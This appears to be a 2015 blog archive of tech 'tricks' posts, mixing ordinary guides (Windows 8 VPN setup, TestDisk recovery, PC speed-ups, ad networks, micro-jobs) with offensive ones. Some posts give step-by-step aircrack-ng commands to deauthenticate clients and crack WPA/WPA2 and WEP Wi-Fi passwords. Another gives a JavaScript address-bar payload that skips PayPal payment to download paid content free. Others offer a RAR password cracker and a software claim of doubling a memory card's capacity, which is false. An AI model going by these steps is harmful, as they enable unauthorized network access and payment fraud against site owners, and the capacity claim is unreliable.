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Wednesday, February 25, 2015

How to Make Windows 8 VPN

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Microsoft’s latest Windows 8 system is totally redesigning the User Interface for touch screen computers and devices, so the steps to create and connect VPN is different from Windows XP or Windows 7 – the steps are way faster and easier.  in Windows 8 the VPN connection icon appears in View Available Networks along with other network connections. Also creating a VPN profile requires very minimum VPN server information, Windows 8 automatically discovers authentication methods and tunnels while connecting, making the VPN connection experience seamless and super easy.

Here are typical steps how to set up VPN connections under Windows 8:

Creating a new Windows 8 VPN connection:

In Windows 8 you can use the Get Connected Wizard to create a VPN profile. To launch the wizard, type vpn in Settings, and then click Set up a virtual private network (VPN) connection.

In the wizard, you will provide the internet address of the VPN server to which you will connect, and a name for the new connection. You can use an IP address or the hostname the VPN server in Internet address field. The destination name is the text that will be used for the VPN connection name (profile name). Note that you can click Remember Credentials which saves your credentials on the first successful connection attempt. This creates a new Discovery Profile which the client can use to connect to VPN.

So far this is the only information needed to create a VPN profile. Authentication and tunneling protocols are negotiated and configured during the first successful connection attempt for username/password based VPN deployments. Once these protocols are negotiated, you can edit these settings in Connection Properties.

Connecting to a corporate network using an existing Windows 8 VPN connection

To connect with an existing VPN connection, open Charms by moving the cursor to the top or bottom right corner of your computer screen. It can also be accessed by using the Win+Chotkey.

Click Settings and then click the network icon displayed in the right-hand corner of the screen.

In Networks click the VPN connection that you want to use and then click Connect.

Once you click Connect, a new connection is negotiated with the server using the saved credentials. If you have not previously checked Remember Credentials while creating the connection, you will be asked to provide credentials.

When you select Remember my credentials while creating your connection, you won’t be asked for the credentials in further connection attempts. You can clear the cached credentials by right-clicking the connection and selecting Clear Cached Credentials, as shown below.

Editing Windows 8 VPN connection properties

You can edit a VPN connection that you have already configured by right-clicking the connection and then selecting Connection Properties.

Connection Properties has four tabs described below. You can access Connection Properties by clicking View Connection Properties in Networks.

Connection Properties Tabs:

General – Change the VPN server hostname or IP address. Additionally, configure an interface to public network.

Options – Configure PPP Settings and enable/disable caching of credentials.

Security – Configure tunnels, authentication, and encryption settings.

Networking – Configure transports (or protocols). The most common protocols are TCP/IPv4 and TCP/IPv6.

Deleting a Windows 8 VPN Connection

In the Start screen, click Search in Charms, type vpn and then click View Network Connections under Settings.

Right-click a VPN connection and then click Delete, as show below


Tuesday, February 24, 2015

Hack Wap/Wap2 wifi pasword

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WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.  certain things to be followed..such as creating virtual machine!!!running in your OS if you have windows..!!

Create a new virtual machine like i have created...!!!

press enter......go on

Now Download BackTrack-Linux.
Then install it on a Live CD/DVD or USB
here a link to download it

"I highly recommend you to download backtrck 32 bit version if you have windows 7. If you have win8 or 8.1 you can download backtrack 64 bit version." 

 At BOOT Menu....just type startx

an Now your all set to go...just simply follow below  


Step 1 :
The result will be something like :Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]

Step 2 :
airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 :
airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.
Step 6 :
open another terminal.aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :
If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.

Download crunch 3.0 (the current version at the time of this writing).

Ater the Download finishes
Install it to a Usb or a Live CD/DVD
To Install it on Backtrack
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters

Sunday, February 22, 2015

15 Alternative for Google Adsense

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To make money from blog,the first thing comes to our mind is Google adsense. I recommend Google adsense as your primary ad network for your blog.Why Google AdsenseGoogle adsense is run by Google,  one of the top tech company in the world.Offers the best payment for each click.They get more number of advertisers (high paying).Integrate with Google AnalyticsWhat if your Google adsense request got rejected for several times or got banned ?  Its time to think about best alternatives.Here i list 15 best high paying ad-networks.

Think About 15 Best Alternatives 


"Click at the Name it will redirect it to the Specific Page."


Trick To ByPass PayPal Payment in over 800+ sites

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Hello Friends, As the name suggests,Today i am going to tell you all a trick by use of which you will be able to download paid software's , Ebooks, Games for free.The Tricks is very simple and works on more than 800 websites..!!! So I suggest you to use this trick when you seriously need because i don't take any responsibility for any harm caused due to this trick because this trick is for educational purpose only and so that if you are a webmaster or owner of a site which is using a java script Paypal button than you can immediately take steps to prevent users from downloading premium content from your site for free.

The Trick:-

1). Open Google and search for the below line without removing the "quotes"
"this order button requires a javascript enabled browser"

 For Example if you want to download ebooks than search for "this order button requires a javascript enabled browser"ebooks
2). Now Choose any site from the search results and wait till the site loads fully.
3).Now copy the below line and paste it in your browser's address bar. as shown in the image below,
javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

Now You will be redirected to the Thankyou or Transaction complete page and now you will be able to 
download the free stuff provided by that website..!!

Saturday, February 21, 2015

Recover Your deleted or formatted files form USB

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TestDisk is a free open source software which helps recovering data from a corrupt usb flash drive. Recently my flash drive got corrupted, and was asking to be formatted under windows once plugged in. I tried opening the pen drive under several operating systems including windows xp, vista, windows 7, fedora, ubuntu etc. But in most of them, “Insert a Disk into drive x” and “Drive is not formatted” error was popping up.
As the data in my removable drive was not that critical, I started experimenting with different free data recovery softwares. Out of them, TestDisk, turned out to be the best in recovering my lost FAT32 partition.

TestDisk Features:

  • Fix partition table and recover lost/deleted partition
  • Rebuild/Recover FAT32 boot sector
  • Fix FAT Tables
  • Rebuild/Recover NTFS boot sector
  • Undelete files from fat, ntfs and ext2 filesystem
  • Copy files from deleted partitions
  • Supported Operating systems: DOS, Windows 2000, XP, Vista, Windows 7, Linux, MacOS X etc

How to Recover Files using TestDisk:

Common symptoms or errors seen when a drive gets corrupted is, Windows Explorer shows primary partition as raw or unformatted and Windows prompts this error message.
“The drive is not formatted, do you want to format it now?”
To recover a partition or repair a file system, you must run TestDisk with full administrator privileges. In Windows Vista, right click Testdisk.exe and select “run as administrator” option.

To recover partition from a media image or repair a filesystem image, run
testdisk image.dd to create a raw disk image
testdisk image.E01 to recover files from an Encase EWF image
testdisk 'image.*' if the Encase image is split into several files

If the partition was reformatted into other file system use these steps given below:

  • Run TestDisk
  • select the hard disk and the partition type
  • choose Advanced
  • select the partition
  • choose Type,
  • enter the value corresponding to the previous filesystem
  • choose Boot
  • choose RebuildBS
  • List
  • If you can see your files, choose Write and confirm
  • In Analyse, choose to rewrite the partition with the correct partition type.

RAR Archive Password Cracker

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Many time the software or books you download online are .rar archive which are password protected First they allow you to download the file by saying it is completely free But when you try to decompress it ask you password and tells you to visit some sites to get the password.But now you can crack the password by
RAR Archive Password Cracker there is no software other than rar remover which can remove the password instantly.

RAR Password Remover

Don't go with the name , it is not a remover but a cracker it uses dictionary attack and Brute force attack to crack rar password

DOWNLOAD  (Torrent )     (For link click at download)

"Warning:-The rar passwords are protected very well, the the cracker may take long time to crack password. it tries approx 35 passwords per second and so don't even think of cracking a 6 or 7 letter password, that will take some hours, a 3 or 4 letter password is more practical."

Friday, February 20, 2015

Make Money Online

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Top 10 Micro Jobs Websites for Online Income 
  • Micro jobs are the best way to start your earnings from internet.There are very simple works.Not difficult works like odesk,freelancer.You will get 0.1 to 0.5 for most tasks you finish.In most of sites you can cashout after you get 10$.In those mini job sites you can create your account freely.No need to pay for sign up.Some sites give sign up bonus also.You can cashout your money using payza,skrill,paypal.In most of sites you can't create two accounts with one ip.
  • So, there is no long-term commitment in case of online micro job opportunities. Such jobs are suitable for those individuals who want to do part-time freelance jobs while managing other things in life. Examples of such people include students, homemakers and bed-ridden people.
Basic steps
  1. Click Sign up
  2. Fill the forms with your details
  3. Confirm your email
  4. Login to your account
  5. Click Jobs
  6. Select a Job and accept it (Don't select one which you cant)
  7. Submit proof.

Wait 5-7 days for review your work and rate by employer.  

Success rate is a very important thing in mini job sites.In most of sites you have to maintain it above 75%.

List Of Micro Jobs Site


Type of job:  Sign up jobs,Kout Jobs,Fb Like,Tweet Retweet,Forum Post   

Pays in: Paypal,skrill    


Type of micro job: Crowdsourcing in writing, translating, data entry and research  
Pays in: US dollars or euros, monthly
Company uses a crowdsourcing platform to distribute tasks to its “clickworkers.”


Type of micro job: Various
This company partners with other micro job outfits, like Mechanical Turk, Swag Bucks or CoinWorker. Once signed up with one of its more than 15 partners microworkers can search its list of available tasks.


Type of micro job: Sign up jobs,Fb Like,Tweet Retweet,Forum Post,G+ Share,Survey
Pays in: Paypal,Payza


Type of micro job: Real-world task site via mobile phone
Pays in: US dollars in PayPal account
Users download the app on their cell phone and earn points by successfully complete “shifts” and then gain access to better paying assignments. The types of micro jobs from this crowdsourcer offers are tasks for consumer brands looking to track their products, so photos of products in stores with price checks are the mainstay of this company. Payments for shifts range from $2 to $20. Available in the United States only at this time.

Some more Jobs Site :-


Crack WEP Encrypted Network By Linux/Ubuntu/Blacktrack

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If you don't have Ubuntu/Linux download 


Enter the terminal as administrator

  • To enter terminal with administrator privilage, type sudo -s in terminal and enter your password.

Get aircrack-ng on your ubuntu or backtrack

  • To get aircrack-ng, type apt-get install airmon-ng.

After the aircrack is downloaded and successfully installed.Type airmon-ng in your terminal.

  •  If everything is OK, you will see the list of WIFI drivers on the terminal.

Now, type airmon-ng start wlan0

  • If everthing goes OK, you can see the message (monitor mode enabled on mon0)

To see available WIFI networks, type airodump-ng mon0

  • If everything is ok, you will get the list of WIFI networks. Network i want to crack is Kurtosis

  • Press CTRL+Z to stop the process.
  • Now, to crack an WEP encrypted network, all you need is enough WIFI packets to obtain the passphrase. To obtain packets type airodump-ng -c (channel) -w (ENCRYPTION) --bssid (bssid) mon0 In my case, i would write airodump-ng -c 2 -w WEP --bssid 04:8D:38:2F:9D:C0 mon0. Dont ever close this terminal.

Open Files> Home. You can see a file with name WEP-01.cap. That is the file that contains packet.

  • Now, lets analyze the packets.

  • Open next terminal with administrator privilage.
  • Type aircrack-ng and drag the WEP-01.cap file to the terminal and hit enter.Dont forget to keep space between aircrack-ng and the file.
  • If the process fails press CTRL+V. After that, Press Up arrow and you can see the previously entered command. As another terminal is retriving packets, you keep on trying the aircrack-ng command.

"If the process fails press CTRL+V. After that, Press Up arrow and you can see the previously entered command. As another terminal is retriving packets, you keep on trying the aircrack-ng command.
Now all you need is packets. See the image below, i tried with 836+760 packets. You need a minimum of 100000+ packets to crack the network. Just keep patience and keep retrieving packets and continuously keep trying the last step." 


Converting 2GB Memory Card to 4 GB With Software Free

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  • How to convert my 2gb pendrive or memory into 4gb. Drive Memory increaser software download and increase your flash drive memory up to 4gb. . This software is also applicable for 1gb to 4gb. Download and and enjoy.

              CLICK HERE


  1. Download the software from the above link
  2. Connect your pendrive, memory card to PC
  3. Extract the software in a folder
  4. Now go to that folder where you extracted the software and open Driver increaser2.bat
  5. It will ask your pendrive, memory card name. Just give your name on the software [cmd].
  6. It will ask you now enter the drive letter. Go to my computer and see which drive contain the pendrive or memory card. Most of the time the H drive contain it. Just type H and press enter.
  7. Wait until the process complete.
  8. Check your 2GB, 1GB pendrive or memory card, Its now 4GB. 


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Simple Tricks That Makes your Computer Faster (Windows)

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In this article i will teach you some tricks on how to make your computer faster


  • This trick is all about removing Unwanted Temporary Files from your PC/laptop.While windows is running,it saves many temporary files making the directory size becomes too large then it not only consumes your hard drive space but also your computer memory.
  1. Go to RUN ( Press Windows key+r)
  2. Type %temp% and hit enter
  3. Delete all files over there.Those files which could not be deleted Leave them.


  • This trick is about startup boosting. Windows by default does not use all the processor in the startup process. So, now will increase the number of processors while system boots. Steps are:
  1. Go to Run (Press Windows key+r)
  2. Type msconfig and hit enter
  3. Go to boot tab and click at advanced options.
  4. Tick the first checkbox and set the maximum number from the drop down box..Click at OK and you are done.


  • The best way to make your computer faster is to reduce the load of the resources. This trick is about removing the unnecessary startup items. To remove unnecessary programs that starts on windows startup, follow the steps below :

  1. Go to Run (Press Windows key+r)
  2. Type msconfig and hit enter.
  3. Go to startup tab and disable the applications that are rarely used. The more program you disable, faster your computer becomes but remember don't disable system or hardware software's like Alps Pointing-device Driver, etc..

SO This is how you can speed up your computer performance in just 3 simple Tricks. Thankyou :)